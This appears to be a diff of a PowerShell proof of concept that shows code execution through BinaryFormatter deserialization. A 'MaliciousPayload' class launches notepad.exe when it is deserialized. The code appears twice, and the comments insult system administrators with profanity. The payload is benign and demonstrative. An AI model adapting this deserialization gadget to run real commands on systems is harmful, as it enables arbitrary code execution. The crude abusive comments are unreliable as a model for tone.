Calvindd2f · December 10, 2025 20:12 · Calvindd2f · Dec 10, 2025
diff --git a/BinaryFormatter_PoC_winpowershell.ps1 b/BinaryFormatter_PoC_winpowershell.ps1
 # BinaryFormatter back with vengence (it never left) because System Admins are too lazy to use PS Core. 'muh ISE' - die in a hole
 [System.AppContext]::SetSwitch('Switch.System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization', $true) # Final working version.
 Add-Type @'
 using System;
 using System.Runtime.Serialization;
 using System.Diagnostics;

 [Serializable]
 public class MaliciousPayload : ISerializable {
    public MaliciousPayload() { }
    
    protected MaliciousPayload(SerializationInfo info, StreamingContext context) {
        Process.Start("notepad.exe");
    }
    
    public void GetObjectData(SerializationInfo info, StreamingContext context) {
        info.SetType(typeof(MaliciousPayload));
    }
 }
 '@
 $payload = [MaliciousPayload]::new()
 $bf = [System.Runtime.Serialization.Formatters.Binary.BinaryFormatter]::new()
 $stream = [System.IO.MemoryStream]::new()
 $bf.Serialize($stream, $payload)
 $stream.Position = 0
 Write-Host "Deserializing malicious payload..."
 $bf.Deserialize($stream)  # This will launch notepad.exe
 Write-Host "Code executed during deserialization"
 Write-Host "POWERSHELL CORE ISN'T THE CLOT SHOT MANDATE - JUST FUCKING DO IT AND STOP BEING A BITCH"
	# BinaryFormatter back with vengence (it never left) because System Admins are too lazy to use PS Core. 'muh ISE' - die in a hole
	[System.AppContext]::SetSwitch('Switch.System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization', $true) # Final working version.
	Add-Type @'
	using System;
	using System.Runtime.Serialization;
	using System.Diagnostics;

	[Serializable]
	public class MaliciousPayload : ISerializable {
	public MaliciousPayload() { }

	protected MaliciousPayload(SerializationInfo info, StreamingContext context) {
	Process.Start("notepad.exe");
	}

	public void GetObjectData(SerializationInfo info, StreamingContext context) {
	info.SetType(typeof(MaliciousPayload));
	}
	}
	'@
	$payload = [MaliciousPayload]::new()
	$bf = [System.Runtime.Serialization.Formatters.Binary.BinaryFormatter]::new()
	$stream = [System.IO.MemoryStream]::new()
	$bf.Serialize($stream, $payload)
	$stream.Position = 0
	Write-Host "Deserializing malicious payload..."
	$bf.Deserialize($stream) # This will launch notepad.exe
	Write-Host "Code executed during deserialization"
	Write-Host "POWERSHELL CORE ISN'T THE CLOT SHOT MANDATE - JUST FUCKING DO IT AND STOP BEING A BITCH"
No results found